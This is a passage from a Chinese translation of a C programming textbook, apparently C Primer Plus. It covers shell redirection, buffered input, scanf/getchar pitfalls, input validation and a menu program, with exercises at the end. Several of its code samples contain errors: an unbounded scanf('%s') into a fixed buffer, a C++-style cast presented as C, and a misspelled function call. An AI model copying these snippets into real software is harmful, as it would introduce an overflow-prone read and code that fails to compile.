mywords的文件,通常会擦除该文件的内容,然后替换新的内容(但是,许 多操作系统有保护现有文件的选项,使其成为只读文件)。所有出现在屏幕 的字母都是你刚才输入的,其副本储存在文件中。在下一行的开始处按下 Ctrl+D(UNIX)或Ctrl+Z(DOS)即可结束该程序。如果不知道输入什么内 容,可参照下面的示例。这里,我们使用UNIX提示符$。记住在每行的末尾 单击Enter键,这样才能把缓冲区的内容发送给程序。 $ echo_eof > mywords You should have no problem recalling which redirection operator does what. Just remember that each operator  points in the direction the information flows. Think of it as 511 a funnel. [Ctrl+D] $ 按下Ctrl+D或Ctrl+Z后,程序会结束,你的系统会提示返回。程序是否 起作用了?UNIX的ls命令或Windows命令行提示模式的dir命令可以列出文件 名,会显示mywords文件已存在。可以使用UNIX或Linux的cat或DOS的type命 令检查文件中的内容,或者再次使用echo_eof,这次把文件重定向到程序: $ echo_eof < mywords You should have no problem recalling which redirection operator does what. Just remember that each operator points in the direction the information flows. Think of it as a funnel. $ 3.组合重定向 现在,假设你希望制作一份mywords文件的副本,并命名为savewords。 只需输入以下命令即可: echo_eof < mywords > savewords 下面的命令也起作用,因为命令与重定向运算符的顺序无关: echo_eof > savewords < mywords 注意:在一条命令中,输入文件名和输出文件名不能相同。 512 echo_eof < mywords > mywords....<--错误 原因是> mywords在输入之前已导致原mywords的长度被截断为0。 总之,在UNIX、Linux或Windows/DOS系统中使用两个重定向运算符 (<和>)时,要遵循以下原则。 重定向运算符连接一个可执行程序(包括标准操作系统命令)和一个数 据文件,不能用于连接一个数据文件和另一个数据文件,也不能用于连接一 个程序和另一个程序。 使用重定向运算符不能读取多个文件的输入,也不能把输出定向至多个 文件。 通常,文件名和运算符之间的空格不是必须的,除非是偶尔在UNIX shell、Linux shell或Windows命令行提示模式中使用的有特殊含义的字符。例 如,我们用过的echo_eof<words。 以上介绍的都是正确的例子,下面来看一下错误的例子,addup和count 是两个可执行程序,fish和beets是两个文本文件: fish > beets        ←违反第1条规则 addup < count        ←违反第1条规则 addup < fish < beets    ←违反第2条规则 count > beets fish     ←违反第2条规则 UNIX、Linux或Windows/DOS 还有>>运算符,该运算符可以把数据添加 到现有文件的末尾,而 | 运算符能把一个文件的输出连接到另一个文件的输 入。欲了解所有相关运算符的内容,请参阅 UNIX 的相关书籍,如UNIX Primer Plus,Third Edition(Wilson、Pierce和Wessler合著)。 4.注释 513 重定位让你能使用键盘输入程序文件。要完成这一任务,程序要测试文 件的末尾。例如,第 7 章演示的统计单词程序(程序清单7.7),计算单词 个数直至遇到第1个|字符。把ch的char类型改成int类型,把循环测试中的|替 换成EOF,便可用该程序来计算文本文件中的单词量。 重定向是一个命令行概念,因为我们要在命令行输入特殊的符号发出指 令。如果不使用命令行环境,也可以使用重定向。首先,一些集成开发环境 提供了菜单选项,让用户指定重定向。其次,对于 Windows系统,可以打开 命令提示窗口,并在命令行运行可执行文件。Microsoft Visual Studio的默认 设置是把可执行文件放在项目文件夹的子文件夹,称为Debug。文件名和项 目名的基本名相同,文件名的扩展名为.exe。默认情况下,Xcode在给项目 命名后才能命名可执行文件,并将其放在Debug文件夹中。在UNIX系统中, 可以通过Terminal工具运行可执行文件。从使用上看,Terminal比命令行编译 器(GCC或Clang)简单。 如果用不了重定向,可以用程序直接打开文件。程序清单8.3演示了一 个注释较少的示例。我们学到第13章时再详细讲解。待读取的文件应该与可 执行文件位于同一目录。 程序清单8.3 file_eof.c程序 // file_eof.c --打开一个文件并显示该文件 #include <stdio.h> #include <stdlib.h>       // 为了使用exit() int main() { int ch; FILE * fp; 514 char fname[50];       // 储存文件名 printf("Enter the name of the file: "); scanf("%s", fname); fp = fopen(fname, "r");   // 打开待读取文件 if (fp == NULL)       // 如果失败 { printf("Failed to open file. Bye\n"); exit(1);         // 退出程序 } // getc(fp)从打开的文件中获取一个字符 while ((ch = getc(fp)) != EOF) putchar(ch); fclose(fp);          // 关闭文件 return 0; } 小结:如何重定向输入和输出 绝大部分C系统都可以使用重定向,可以通过操作系统重定向所有程 序,或只在C编译器允许的情况下重定向C程序。假设prog是可执行程序 名,file1和file2是文件名。 把输出重定向至文件:> 515 prog >file1 把输入重定向至文件:< prog <file2 组合重定向: prog <file2 >file1 prog >file1 <file2 这两种形式都是把file2作为输入、file1作为输出。 留白: 一些系统要求重定向运算符左侧有一个空格,右侧没有空格。而其他系 统(如,UNIX)允许在重定位运算符两侧有空格或没有空格。 516 8.5 创建更友好的用户界面 大部分人偶尔会写一些中看不中用的程序。还好,C提供了大量工具让 输入更顺畅,处理过程更顺利。不过,学习这些工具会导致新的问题。本节 的目标是,指导读者解决这些问题并创建更友好的用户界面,让交互数据输 入更方便,减少错误输入的影响。 8.5.1 使用缓冲输入 缓冲输入用起来比较方便,因为在把输入发送给程序之前,用户可以编 辑输入。但是,在使用输入的字符时,它也会给程序员带来麻烦。前面示例 中看到的问题是,缓冲输入要求用户按下Enter键发送输入。这一动作也传 送了换行符,程序必须妥善处理这个麻烦的换行符。我们以一个猜谜程序为 例。用户选择一个数字,程序猜用户选中的数字是多少。该程序使用的方法 单调乏味,先不要在意算法,我们关注的重点在输入和输出。查看程序清单 8.4,这是猜谜程序的最初版本,后面我们会改进。 程序清单8.4 guess.c程序 /* guess.c -- 一个拖沓且错误的猜数字程序 */ #include <stdio.h> int main(void) { int guess = 1; printf("Pick an integer from 1 to 100. I will try to  guess "); printf("it.\nRespond with a y if my guess is right and  with"); 517 printf("\nan n if it is wrong.\n"); printf("Uh...is your number %d?\n", guess); while (getchar() != 'y')   /* 获取响应,与 y 做对比 */ printf("Well, then, is it %d?\n", ++guess); printf("I knew I could do it!\n"); return 0; } 下面是程序的运行示例: Pick an integer from 1 to 100. I will try to guess it. Respond with a y if my guess is right and with an n if it is wrong. Uh...is your number 1? n Well, then, is it 2? Well, then, is it 3? n Well, then, is it 4? Well, then, is it 5? y 518 I knew I could do it! 撇开这个程序糟糕的算法不谈,我们先选择一个数字。注意,每次输入 n 时,程序打印了两条消息。这是由于程序读取n作为用户否定了数字1,然 后还读取了一个换行符作为用户否定了数字2。 一种解决方案是,使用while循环丢弃输入行最后剩余的内容,包括换 行符。这种方法的优点是,能把no和no way这样的响应视为简单的n。程序 清单8.4的版本会把no当作两个响应。下面用循环修正 char response;这个问题: while (getchar() != 'y')  /* 获取响应,与 y 做对比*/ { printf("Well, then, is it %d?\n", ++guess); while (getchar() != '\n') continue;     /* 跳过剩余的输入行 */ } 使用以上循环后,该程序的输出示例如下: Pick an integer from 1 to 100. I will try to guess it. Respond with a y if my guess is right and with an n if it is wrong. Uh...is your number 1? n 519 Well, then, is it 2? no Well, then, is it 3? no sir Well, then, is it 4? forget it Well, then, is it 5? y I knew I could do it! 这的确是解决了换行符的问题。但是,该程序还是会把f被视为n。我们 用if语句筛选其他响应。首先,添加一个char类型的变量储存响应: 修改后的循环如下: while ((response = getchar()) != 'y') /* 获取响应 */ { if (response == 'n') printf("Well, then, is it %d?\n", ++guess); else printf("Sorry, I understand only y or n.\n"); while (getchar() != '\n') 520 continue; /* 跳过剩余的输入行 */ } 现在,程序的运行示例如下: Pick an integer from 1 to 100. I will try to guess it. Respond with a y if my guess is right and with an n if it is wrong. Uh...is your number 1? n Well, then, is it 2? no Well, then, is it 3? no sir Well, then, is it 4? forget it Sorry, I understand only y or n. n Well, then, is it 5? y I knew I could do it! 521 在编写交互式程序时,应该事先预料到用户可能会输入错误,然后设计 程序处理用户的错误输入。在用户出错时通知用户再次输入。 当然,无论你的提示写得多么清楚,总会有人误解,然后抱怨这个程序 设计得多么糟糕。 8.5.2 混合数值和字符输入 假设程序要求用 getchar()处理字符输入,用 scanf()处理数值输入,这两 个函数都能很好地完成任务,但是不能把它们混用。因为 getchar()读取每个 字符,包括空格、制表符和换行符;而 scanf()在读取数字时则会跳过空格、 制表符和换行符。 我们通过程序清单8.5来解释这种情况导致的问题。该程序读入一个字 符和两个数字,然后根据输入的两个数字指定的行数和列数打印该字符。 程序清单8.5 showchar1.c程序 /* showchar1.c -- 有较大 I/O 问题的程序 */ #include <stdio.h> void display(char cr, int lines, int width); int main(void) { int ch;        /* 待打印字符  */ int rows, cols;    /* 行数和列数 */ printf("Enter a character and two integers:\n"); while ((ch = getchar()) != '\n') 522 { scanf("%d %d", &rows, &cols); display(ch, rows, cols); printf("Enter another character and two integers;\n"); printf("Enter a newline to quit.\n"); } printf("Bye.\n"); return 0; } void display(char cr, int lines, int width) { int row, col; for (row = 1; row <= lines; row++) { for (col = 1; col <= width; col++) putchar(cr); putchar('\n');/* 结束一行并开始新的一行 */ } } 523 注意,该程序以 int 类型读取字符(这样做可以检测 EOF),但是却以 char 类型把字符传递给display()函数。因为char比int小,一些编译器会给出 类型转换的警告。可以忽略这些警告,或者用下面的强制类型转换消除警 告: display(char(ch), rows, cols); 在该程序中,main()负责获取数据,display()函数负责打印数据。下面 是该程序的一个运行示例,看看有什么问题: Enter a character and two integers: c 2 3 ccc ccc Enter another character and two integers; Enter a newline to quit. Bye. 该程序开始时运行良好。你输入c 2 3,程序打印c字符2行3列。然后, 程序提示输入第2组数据,还没等你输入数据程序就退出了!这是什么情 况?又是换行符在捣乱,这次是输入行中紧跟在 3 后面的换行符。scanf()函 数把这个换行符留在输入队列中。和 scanf()不同,getchar()不会跳过换行 符,所以在进入下一轮迭代时,你还没来得及输入字符,它就读取了换行 符,然后将其赋给ch。而ch是换行符正式终止循环的条件。 要解决这个问题,程序要跳过一轮输入结束与下一轮输入开始之间的所 有换行符或空格。另外,如果该程序不在getchar()测试时,而在scanf()阶段 终止程序会更好。修改后的版本如程序清单8.6所示。 524 程序清单8.6 showchar2.c程序 /* showchar2.c -- 按指定的行列打印字符 */ #include <stdio.h> void display(char cr, int lines, int width); int main(void) { int ch;        /* 待打印字符*/ int rows, cols;    /* 行数和列数 */ printf("Enter a character and two integers:\n"); while ((ch = getchar()) != '\n') { if (scanf("%d %d", &rows, &cols) != 2) break; display(ch, rows, cols); while (getchar() != '\n') continue; printf("Enter another character and two integers;\n"); printf("Enter a newline to quit.\n"); } 525 printf("Bye.\n"); return 0; } void display(char cr, int lines, int width) { int row, col; for (row = 1; row <= lines; row++) { for (col = 1; col <= width; col++) putchar(cr); putchar('\n');  /* 结束一行并开始新的一行 */ } } while循环实现了丢弃scanf()输入后面所有字符(包括换行符)的功能, 为循环的下一轮读取做好了准备。该程序的运行示例如下: Enter a character and two integers: c 1 2 cc Enter another character and two integers; 526 Enter a newline to quit. ! 3 6 !!!!!! !!!!!! !!!!!! Enter another character and two integers; Enter a newline to quit. Bye. 在if语句中使用一个break语句,可以在scanf()的返回值不等于2时终止 程序,即如果一个或两个输入值不是整数或者遇到文件结尾就终止程序。 527 8.6 输入验证 在实际应用中,用户不一定会按照程序的指令行事。用户的输入和程序 期望的输入不匹配时常发生,这会导致程序运行失败。作为程序员,除了完 成编程的本职工作,还要事先预料一些可能的输入错误,这样才能编写出能 检测并处理这些问题的程序。 例如,假设你编写了一个处理非负数整数的循环,但是用户很可能输入 一个负数。你可以使用关系表达式来排除这种情况: long n; scanf("%ld", &n);   // 获取第1个值 while (n >= 0)     // 检测不在范围内的值 { // 处理n scanf("%ld", &n); // 获取下一个值 } 另一类潜在的陷阱是,用户可能输入错误类型的值,如字符 q。排除这 种情况的一种方法是,检查scanf()的返回值。回忆一下,scanf()返回成功读 取项的个数。因此,下面的表达式当且仅当用户输入一个整数时才为真: scanf("%ld", &n) == 1 结合上面的while循环,可改进为: long n; while (scanf("%ld", &n) == 1 && n >= 0) 528 { //处理n } while循环条件可以描述为“当输入是一个整数且该整数为正时”。 对于最后的例子,当用户输入错误类型的值时,程序结束。然而,也可 以让程序友好些,提示用户再次输入正确类型的值。在这种情况下,要处理 有问题的输入。如果scanf()没有成功读取,就会将其留在输入队列中。这里 要明确,输入实际上是字符流。可以使用getchar()函数逐字符地读取输入, 甚至可以把这些想法都结合在一个函数中,如下所示: long get_long(void) { long input; char ch; while (scanf("%ld", &input) != 1) { while ((ch = getchar()) != '\n') putchar(ch); // 处理错误的输入 printf(" is not an integer.\nPlease enter an "); printf("integer value, such as 25, -178, or 3: "); } 529 return input; } 该函数要把一个int类型的值读入变量input中。如果读取失败,函数则进 入外层while循环体。然后内层循环逐字符地读取错误的输入。注意,该函 数丢弃该输入行的所有剩余内容。还有一个方法是,只丢弃下一个字符或单 词,然后该函数提示用户再次输入。外层循环重复运行,直到用户成功输入 整数,此时scanf()的返回值为1。 在用户输入整数后,程序可以检查该值是否有效。考虑一个例子,要求 用户输入一个上限和一个下限来定义值的范围。在该例中,你可能希望程序 检查第1个值是否大于第2个值(通常假设第1个值是较小的那个值),除此 之外还要检查这些值是否在允许的范围内。例如,当前的档案查找一般不会 接受 1958 年以前和2014年以后的查询任务。这个限制可以在一个函数中实 现。 假设程序中包含了stdbool.h 头文件。如果当前系统不允许使用_Bool, 把bool替换成int,把true 替换成 1,把 false 替换成 0 即可。注意,如果输入 无效,该函数返回 true,所以函数名为bad_limits(): bool bad_limits(long begin, long end,long low, long high) { bool not_good = false; if (begin > end) { printf("%ld isn't smaller than %ld.\n", begin, end); not_good = true; 530 } if (begin < low || end < low) { printf("Values must be %ld or greater.\n", low); not_good = true; } if (begin > high || end > high) { printf("Values must be %ld or less.\n", high); not_good = true; } return not_good; } 程序清单8.7使用了上面的两个函数为一个进行算术运算的函数提供整 数,该函数计算特定范围内所有整数的平方和。程序限制了范围的上限是 10000000,下限是-10000000。 程序清单8.7 checking.c程序 // checking.c -- 输入验证 #include <stdio.h> #include <stdbool.h> 531 // 验证输入是一个整数 long get_long(void); // 验证范围的上下限是否有效 bool bad_limits(long begin, long end, long low, long high); // 计算a~b之间的整数平方和 double sum_squares(long a, long b); int main(void) { const long MIN = -10000000L;  // 范围的下限 const long MAX = +10000000L;  // 范围的上限 long start;            // 用户指定的范围最小值 long stop;             // 用户指定的范围最大值 double answer; printf("This program computes the sum of the squares of " "integers in a range.\nThe lower bound should not " "be less than -10000000 and\nthe upper bound " "should not be more than +10000000.\nEnter the " "limits (enter 0 for both limits to quit):\n" 532 "lower limit: "); start = get_long(); printf("upper limit: "); stop = get_long(); while (start != 0 || stop != 0) { if (bad_limits(start, stop, MIN, MAX)) printf("Please try again.\n"); else { answer = sum_squares(start, stop); printf("The sum of the squares of the integers "); printf("from %ld to %ld is %g\n", start, stop, answer); } printf("Enter the limits (enter 0 for both " "limits to quit):\n"); printf("lower limit: "); start = get_long(); 533 printf("upper limit: "); stop = get_long(); } printf("Done.\n"); return 0; } long get_long(void) { long input; char ch; while (scanf("%ld", &input) != 1) { while ((ch = getchar()) != '\n') putchar(ch);       // 处理错误输入 printf(" is not an integer.\nPlease enter an "); printf("integer value, such as 25, -178, or 3: "); } return input; } 534 double sum_squares(long a, long b) { double total = 0; long i; for (i = a; i <= b; i++) total += (double) i * (double) i; return total; } bool bad_limits(long begin, long end, long low, long high) { bool not_good = false; if (begin > end) { printf("%ld isn't smaller than %ld.\n", begin, end); not_good = true; } if (begin < low || end < low) { 535 printf("Values must be %ld or greater.\n", low); not_good = true; } if (begin > high || end > high) { printf("Values must be %ld or less.\n", high); not_good = true; } return not_good; } 下面是该程序的输出示例: This program computes the sum of the squares of integers  in a range. The lower bound should not be less than -10000000 and the upper bound should not be more than +10000000. Enter the limits (enter 0 for both limits to quit): lower limit: low low is not an integer. Please enter an integer value, such as 25, -178, or 3: 3 536 upper limit: a big number a big number is not an integer. Please enter an integer value, such as 25, -178, or 3: 12 The sum of the squares of the integers from 3 to 12 is  645 Enter the limits (enter 0 for both limits to quit): lower limit: 80 upper limit: 10 80 isn't smaller than 10. Please try again. Enter the limits (enter 0 for both limits to quit): lower limit: 0 upper limit: 0 Done. 8.6.1 分析程序 虽然checking.c程序的核心计算部分(sum_squares()函数)很短,但是输 入验证部分比以往程序示例要复杂。接下来分析其中的一些要素,先着重讨 论程序的整体结构。 程序遵循模块化的编程思想,使用独立函数(模块)来验证输入和管理 显示。程序越大,使用模块化编程就越重要。 537 main()函数管理程序流,为其他函数委派任务。它使用 get_long()获取 值、while 循环处理值、badlimits()函数检查值是否有效、sum_squres()函数 处理实际的计算: start = get_long(); printf("upper limit: "); stop = get_long(); while (start != 0 || stop != 0) { if (bad_limits(start, stop, MIN, MAX)) printf("Please try again.\n"); else { answer = sum_squares(start, stop); printf("The sum of the squares of the integers "); printf("from %ld to %ld is %g\n", start, stop, answer); } printf("Enter the limits (enter 0 for both " "limits to quit):\n"); printf("lower limit: "); start = get_long(); 538 printf("upper limit: "); stop = get_long(); } 8.6.2 输入流和数字 在编写处理错误输入的代码时(如程序清单8.7),应该很清楚C是如何 处理输入的。考虑下面的输入: is 28 12.4 在我们眼中,这就像是一个由字符、整数和浮点数组成的字符串。但是 对 C程序而言,这是一个字节流。第1个字节是字母i的字符编码,第2个字 节是字母s的字符编码,第3个字节是空格字符的字符编码,第4个字节是数 字2的字符编码,等等。所以,如果get_long()函数处理这一行输入,第1个 字符是非数字,那么整行输入都会被丢弃,包括其中的数字,因为这些数字 只是该输入行中的其他字符: while ((ch = getchar()) != '\n') putchar(ch); // 处理错误的输入 虽然输入流由字符组成,但是也可以设置scanf()函数把它们转换成数 值。例如,考虑下面的输入: 42 如果在scanf()函数中使用%c转换说明,它只会读取字符4并将其储存在 char类型的变量中。如果使用%s转换说明,它会读取字符4和字符2这两个字 符,并将其储存在字符数组中。如果使用%d转换说明,scanf()同样会读取 两个字符,但是随后会计算出它们对应的整数值:4×10+2,即42,然后将 表示该整数的二进制数储存在 int 类型的变量中。如果使用%f 转换说明, 539 scanf()也会读取两个字符,计算出它们对应的数值42.0,用内部的浮点表示 法表示该值,并将结果储存在float类型的变量中。 简而言之,输入由字符组成,但是scanf()可以把输入转换成整数值或浮 点数值。使用转换说明(如%d或%f)限制了可接受输入的字符类型,而 getchar()和使用%c的scanf()接受所有的字符。 540 8.7 菜单浏览 许多计算机程序都把菜单作为用户界面的一部分。菜单给用户提供方便 的同时,却给程序员带来了一些麻烦。我们看看其中涉及了哪些问题。 菜单给用户提供了一份响应程序的选项。假设有下面一个例子: Enter the letter of your choice: a. advice       b. bell c. count        q. quit 理想状态是,用户输入程序所列选项之一,然后程序根据用户所选项完 成任务。作为一名程序员,自然希望这一过程能顺利进行。因此,第1个目 标是:当用户遵循指令时程序顺利运行;第2个目标是:当用户没有遵循指 令时,程序也能顺利运行。显而易见,要实现第 2 个目标难度较大,因为很 难预料用户在使用程序时的所有错误情况。 现在的应用程序通常使用图形界面,可以点击按钮、查看对话框、触摸 图标,而不是我们示例中的命令行模式。但是,两者的处理过程大致相同: 给用户提供选项、检查并执行用户的响应、保护程序不受误操作的影响。除 了界面不同,它们底层的程序结构也几乎相同。但是,使用图形界面更容易 通过限制选项控制输入。 8.7.1 任务 我们来更具体地分析一个菜单程序需要执行哪些任务。它要获取用户的 响应,根据响应选择要执行的动作。另外,程序应该提供返回菜单的选项。 C 的 switch 语句是根据选项决定行为的好工具,用户的每个选择都可以对应 一个特定的case标签。使用while语句可以实现重复访问菜单的功能。因此, 我们写出以下伪代码: 获取选项 541 当选项不是'q'时 转至相应的选项并执行 获取下一个选项 8.7.2 使执行更顺利 当你决定实现这个程序时,就要开始考虑如何让程序顺利运行(顺利运 行指的是,处理正确输入和错误输入时都能顺利运行)。例如,你能做的是 让“获取选项”部分的代码筛选掉不合适的响应,只把正确的响应传入 switch。这表明需要为输入过程提供一个只返回正确响应的函数。结合while 循环和switch语句,其程序结构如下: #include <stdio.h> char get_choice(void); void count(void); int main(void) { int choice; while ((choice = get_choice()) != 'q') { switch (choice) { case 'a': printf("Buy low, sell high.\n"); 542 break; case 'b': putchar('\a'); /* ANSI */ break; case 'c': count(); break; default:  printf("Program error!\n"); break; } } return 0; } 定义get_choice()函数只能返回'a'、'b'、'c'和'q'。get_choice()的用法和 getchar()相同,两个函数都是获取一个值,并与终止值(该例中是'q')作比 较。我们尽量简化实际的菜单选项,以便读者把注意力集中在程序结构上。 稍后再讨论 count()函数。default 语句可以方便调试。如果get_choice()函数没 能把返回值限制为菜单指定的几个选项值,default语句有助于发现问题所 在。 get_choice()函数 下面的伪代码是设计这个函数的一种方案: 显示选项 获取用户的响应 543 当响应不合适时 提示用户再次输入 获取用户的响应 下面是一个简单而笨拙的实现: char get_choice(void) { int ch; printf("Enter the letter of your choice:\n"); printf("a. advice        b. bell\n"); printf("c. count         q. quit\n"); ch = getchar(); while ((ch < 'a' || ch > 'c') && ch != 'q') { printf("Please respond with a, b, c, or q.\n"); ch = getchar(); } return ch; } 缓冲输入依旧带来些麻烦,程序把用户每次按下 Return 键产生的换行 544 符视为错误响应。为了让程序的界面更流畅,该函数应该跳过这些换行符。 这类问题有多种解决方案。一种是用名为get_first()的新函数替换 getchar()函数,读取一行的第1个字符并丢弃剩余的字符。这种方法的优点 是,把类似act这样的输入视为简单的a,而不是继续把act中的c作为选项c的 一个有效的响应。我们重写输入函数如下: char get_choice(void) { int ch; printf("Enter the letter of your choice:\n"); printf("a. advice         b. bell\n"); printf("c. count          q. quit\n"); ch = get_first(); while ((ch < 'a' || ch > 'c') && ch != 'q') { printf("Please respond with a, b, c, or q.\n"); ch = getfirst(); } return ch; } char get_first(void) 545 { int ch; ch = getchar();  /* 读取下一个字符 */ while (getchar() != '\n') continue; /* 跳过该行剩下的内容 */ return ch; } 8.7.3 混合字符和数值输入 前面分析过混合字符和数值输入会产生一些问题,创建菜单也有这样的 问题。例如,假设count()函数(选择c)的代码如下: void count(void) { int n, i; printf("Count how far? Enter an integer:\n"); scanf("%d", &n); for (i = 1; i <= n; i++) printf("%d\n", i); } 如果输入3作为响应,scanf()会读取3并把换行符留在输入队列中。下次 调用 get_choice()将导致get_first()返回这个换行符,从而导致我们不希望出 546 现的行为。 重写 get_first(),使其返回下一个非空白字符而不仅仅是下一个字符, 即可修复这个问题。我们把这个任务留给读者作为练习。另一种方法是,在 count()函数中清理换行符,如下所示: void count(void) { int n, i; printf("Count how far? Enter an integer:\n"); n = get_int(); for (i = 1; i <= n; i++) printf("%d\n", i); while (getchar() != '\n') continue; } 该函数借鉴了程序清单8.7中的get_long()函数,将其改为get_int()获取int 类型的数据而不是long类型的数据。回忆一下,原来的get_long()函数如何检 查有效输入和让用户重新输入。程序清单8.8演示了菜单程序的最终版本。 程序清单8.8 menuette.c程序 /* menuette.c -- 菜单程序 */ #include <stdio.h> 547 char get_choice(void); char get_first(void); int get_int(void); void count(void); int main(void) { int choice; void count(void); while ((choice = get_choice()) != 'q') { switch (choice) { case 'a':  printf("Buy low, sell high.\n"); break; case 'b': putchar('\a');  /* ANSI */ break; case 'c':  count(); break; default:  printf("Program error!\n"); 548 break; } } printf("Bye.\n"); return 0; } void count(void) { int n, i; printf("Count how far? Enter an integer:\n"); n = get_int(); for (i = 1; i <= n; i++) printf("%d\n", i); while (getchar() != '\n') continue; } char get_choice(void) { int ch; 549 printf("Enter the letter of your choice:\n"); printf("a. advice       b. bell\n"); printf("c. count        q. quit\n"); ch = get_first(); while ((ch < 'a' || ch > 'c') && ch != 'q') { printf("Please respond with a, b, c, or q.\n"); ch = get_first(); } return ch; } char get_first(void) { int ch; ch = getchar(); while (getchar() != '\n') continue; return ch; } 550 int get_int(void) { int input; char ch; while (scanf("%d", &input) != 1) { while ((ch = getchar()) != '\n') putchar(ch); // 处理错误输出 printf(" is not an integer.\nPlease enter an "); printf("integer value, such as 25, -178, or 3: "); } return input; } 下面是该程序的一个运行示例: Enter the letter of your choice: a. advice         b. bell c. count         q. quit a Buy low, sell high. 551 Enter the letter of your choice: a. advice         b. bell c. count         q. quit count Count how far? Enter an integer: two two is not an integer. Please enter an integer value, such as 25, -178, or 3: 5 1 2 3 4 5 Enter the letter of your choice: a. advice         b. bell c. count         q. quit d Please respond with a, b, c, or q. q 552 要写出一个自己十分满意的菜单界面并不容易。但是,在开发了一种可 行的方案后,可以在其他情况下复用这个菜单界面。 学完以上程序示例后,还要注意在处理较复杂的任务时,如何让函数把 任务委派给另一个函数。这样让程序更模块化。 553 8.8 关键概念 C程序把输入作为传入的字节流。getchar()函数把每个字符解释成一个 字符编码。scanf()函数以同样的方式看待输入,但是根据转换说明,它可以 把字符输入转换成数值。许多操作系统都提供重定向,允许用文件代替键盘 输入,用文件代替显示器输出。 程序通常接受特殊形式的输入。可以在设计程序时考虑用户在输入时可 能犯的错误,在输入验证部分处理这些错误情况,让程序更强健更友好。 对于一个小型程序,输入验证可能是代码中最复杂的部分。处理这类问 题有多种方案。例如,如果用户输入错误类型的信息,可以终止程序,也可 以给用户提供有限次或无限次机会重新输入。 554 8.9 本章小结 许多程序使用 getchar()逐字符读取输入。通常,系统使用行缓冲输入, 即当用户按下 Enter 键后输入才被传送给程序。按下Enter键也传送了一个换 行符,编程时要注意处理这个换行符。ANSI C把缓冲输入作为标准。 通过标准I/O包中的一系列函数,以统一的方式处理不同系统中的不同 文件形式,是C语言的特性之一。getchar()和 scanf()函数也属于这一系列。 当检测到文件结尾时,这两个函数都返回 EOF(被定义在stdio.h头文件 中)。在不同系统中模拟文件结尾条件的方式稍有不同。在UNIX系统中, 在一行开始处按下Ctrl+D可以模拟文件结尾条件;而在DOS系统中则使用 Ctrl+Z。 许多操作系统(包括UNIX和DOS)都有重定向的特性,因此可以用文 件代替键盘和屏幕进行输入和输出。读到EOF即停止读取的程序可用于键盘 输入和模拟文件结尾信号,或者用于重定向文件。 混合使用 getchar()和 scanf()时,如果在调用 getchar()之前,scanf()在输 入行留下一个换行符,会导致一些问题。不过,意识到这个问题就可以在程 序中妥善处理。 编写程序时,要认真设计用户界面。事先预料一些用户可能会犯的错 误,然后设计程序妥善处理这些错误情况。 555 8.10 复习题 复习题的参考答案在附录A中。 1.putchar(getchar())是一个有效表达式,它实现什么功能? getchar(putchar())是否也是有效表达式? 2.下面的语句分别完成什么任务? a.putchar('H'); b.putchar('\007'); c.putchar('\n'); d.putchar('\b'); 3.假设有一个名为 count 的可执行程序,用于统计输入的字符数。设计 一个使用 count 程序统计essay文件中字符数的命令行,并把统计结果保存在 essayct文件中。 4.给定复习题3中的程序和文件,下面哪一条是有效的命令? a.essayct <essay b.count essay c.essay >count 5.EOF是什么? 6.对于给定的输出(ch是int类型,而且是缓冲输入),下面各程序段的 输出分别是什么? a.输入如下: 556 If you quit, I will.[enter] 程序段如下: while ((ch = getchar()) != 'i') putchar(ch); b.输入如下: Harhar[enter] 程序段如下: while ((ch = getchar()) != '\n') { putchar(ch++); putchar(++ch); } 7.C如何处理不同计算机系统中的不同文件和换行约定? 8.在使用缓冲输入的系统中,把数值和字符混合输入会遇到什么潜在的 问题? 557 8.11 编程练习 下面的一些程序要求输入以EOF终止。如果你的操作系统很难或根本无 法使用重定向,请使用一些其他的测试来终止输入,如读到&字符时停止。 1.设计一个程序,统计在读到文件结尾之前读取的字符数。 2.编写一个程序,在遇到 EOF 之前,把输入作为字符流读取。程序要 打印每个输入的字符及其相应的ASCII十进制值。注意,在ASCII序列中,空 格字符前面的字符都是非打印字符,要特殊处理这些字符。如果非打印字符 是换行符或制表符,则分别打印\n或\t。否则,使用控制字符表示法。例 如,ASCII的1是Ctrl+A,可显示为^A。注意,A的ASCII值是Ctrl+A的值加上 64。其他非打印字符也有类似的关系。除每次遇到换行符打印新的一行之 外,每行打印10对值。(注意:不同的操作系统其控制字符可能不同。) 3.编写一个程序,在遇到 EOF 之前,把输入作为字符流读取。该程序 要报告输入中的大写字母和小写字母的个数。假设大小写字母数值是连续 的。或者使用ctype.h库中合适的分类函数更方便。 4.编写一个程序,在遇到EOF之前,把输入作为字符流读取。该程序要 报告平均每个单词的字母数。不要把空白统计为单词的字母。实际上,标点 符号也不应该统计,但是现在暂时不同考虑这么多(如果你比较在意这点, 考虑使用ctype.h系列中的ispunct()函数)。 5.修改程序清单8.4的猜数字程序,使用更智能的猜测策略。例如,程序 最初猜50,询问用户是猜大了、猜小了还是猜对了。如果猜小了,那么下一 次猜测的值应是50和100中值,也就是75。如果这次猜大了,那么下一次猜 测的值应是50和75的中值,等等。使用二分查找(binary search)策略,如 果用户没有欺骗程序,那么程序很快就会猜到正确的答案。 6.修改程序清单8.8中的get_first()函数,让该函数返回读取的第1个非空 白字符,并在一个简单的程序中测试。 558 7.修改第7章的编程练习8,用字符代替数字标记菜单的选项。用q代替5 作为结束输入的标记。 8.编写一个程序,显示一个提供加法、减法、乘法、除法的菜单。获得 用户选择的选项后,程序提示用户输入两个数字,然后执行用户刚才选择的 操作。该程序只接受菜单提供的选项。程序使用float类型的变量储存用户输 入的数字,如果用户输入失败,则允许再次输入。进行除法运算时,如果用 户输入0作为第2个数(除数),程序应提示用户重新输入一个新值。该程序 的一个运行示例如下: Enter the operation of your choice: a. add        s. subtract m. multiply     d. divide q. quit a Enter first number: 22 .4 Enter second number: one one is not an number. Please enter a number, such as 2.5, -1.78E8, or 3: 1 22.4 + 1 = 23.4 Enter the operation of your choice: a. add        s. subtract m. multiply     d. divide 559 q. quit d Enter first number: 18.4 Enter second number: 0 Enter a number other than 0: 0.2 18.4 / 0.2 = 92 Enter the operation of your choice: a. add        s. subtract m. multiply     d. divide q. quit q Bye. 560 第9章 函数 本章介绍以下内容: 关键字:return 运算符:*(一元)、&(一元) 函数及其定义方式 如何使用参数和返回值 如何把指针变量用作函数参数 函数类型 ANSI C原型 递归 如何组织程序?C的设计思想是,把函数用作构件块。我们已经用过C 标准库的函数,如printf()、scanf()、getchar()、putchar()和 strlen()。现在要进 一步学习如何创建自己的函数。前面章节中已大致介绍了相关过程,本章将 巩固以前学过的知识并做进一步的拓展。 561 9.1 复习函数 首先,什么是函数?函数(function)是完成特定任务的独立程序代码 单元。语法规则定义了函数的结构和使用方式。虽然C中的函数和其他语言 